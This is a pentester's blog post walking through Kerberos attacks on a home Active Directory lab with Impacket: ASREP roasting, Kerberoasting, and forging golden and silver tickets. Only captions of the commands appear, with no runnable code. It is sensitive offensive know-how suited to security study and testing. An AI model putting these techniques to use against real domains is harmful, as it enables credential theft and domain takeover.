Impacket Deep Dives Vol. 2: Attacking Kerberos

Cerberus: the 3-headed guard of the underworld in Greek myth

Overview

In my previous post, I discussed different ways to get command execution on Windows hosts with Impacket. In this post, I’m going to discuss how to attack Kerberos in Windows Active Directory with Impacket’s toolset.

Lab Setup

For the purposes of this series, I’ve built a (very) small Active Directory lab with a Domain Controller and two Windows workstations that are joined to the domain:

  • KANTO.local/SQUIRTLE 10.0.1.52
  • KANTO.local/IVYSAUR 10.0.1.53

Attack I: ASREP Roasting

Unlike some of the attacks that will be covered later in this article, ASREP Roasting is somewhat uncommon, so I’ve provided a section on the theory of how the attack works as well as details on how to exploit it.

Theory

The underlying vulnerability in Kerberos that ASREP Roasting exploits is that there is an optional (non-default) flag for user accounts called UF_DONT_REQUIRE_PREAUTH. The flag is intended to support backwards compatibility with older versions of Kerberos. If this flag is set for a user account, a TGT (in a KRB_AS_REP, hence ASREP Roasting) may be requested via a KRB_AS_REQ (details of these messages can be found in RFC 4120) message without requiring pre-authentication. In essence, if you have a username or usernames of domain users that have this flag set, you can request TGT’s for them.

Exploitation

To exploit this vulnerability with Impacket, we need a list of usernames to try to ASREP Roast. If possible, you should try to use LDAP to query the domain for users with the flag set, but that does require domain access. If you want, you can blindly use this attack with a wordlist of usernames that may or may not exist in the domain, but be aware that requesting TGTs for accounts that don’t have the flag set will move you one attempt closer to password lockout.

ASREP Roasting the users on our wordlist
Cracking the ASREP Roasted Users’ passwords

Attack II: Kerberoasting

Kerberoasting is a super common and well-known attack, so I won’t go into details on the mechanics of how it works here. To successfully launch the attack, you need credentials for a domain user (or an NTLM hash, or a Kerberos ticket). The attack will give you a file of hashes that you can crack with either John the Ripper or with Hashcat — it appears to be compatible with both.

Attack III: Golden Ticket

Impacket contains tools for both forging and using golden tickets, so in this section, I’m going to go over how to forge one, and then how to actually use it with Impacket’s various tools for command execution.

Forging a Golden Ticket

To forge a golden ticket, we need a couple of pieces of information: the NTHash of the krbtgt account on the domain controller and the domain SID. We can find this information using Impacket’s secretsdump.py script, assuming that we have Administrator access to the domain controller:

Finding the NTHash for the krbtgt account
Finding the domain SID
Forging a golden ticket for the domain administrator “brock”

Using a Golden Ticket

If you have a golden ticket in the .kirbi format (commonly used by Mimikatz and various PowerShell tools), you need to convert it into a .ccache file, as shown below. If you forged it with ticketer.py, you should already have a .ccache file and can skip this step.

Converting a .kirbi file into a .ccache file
Setting the KRB5CCNAME environment variable for Impacket
Using a golden ticket

Attack IV: Silver Ticket

This attack is very similar to the golden ticket attack, so I’m just going to briefly give the command to forge it:

Footnote: Attack V: Abusing Unconstrained Delegation

Theory

Delegation is a way to allow a service or computer to impersonate domain users elsewhere in the domain. There are two types of delegation: constrained and unconstrained. Constrained delegation allows you to specify a variety of SPNs that the service is allowed to impersonate. Unconstrained delegation allows a service or computer to impersonate any domain user. Unconstrained delegation is especially common in older domains — before 2003 constrained delegation wasn’t an option.

Exploitation

Exploiting unconstrained delegation is a pretty long and involved process, so I’m adding it as a footnote here. If you’re interested in reading a solid write-up on how to exploit it, pour yourself a cup of coffee and check out this article.

Conclusion

In this article, I’ve gone over how to exploit common vulnerabilities in Kerberos and Active Directory using the Impacket suite. Let me know what you think below!

Student, hacker, OSCP. My other computer is your computer.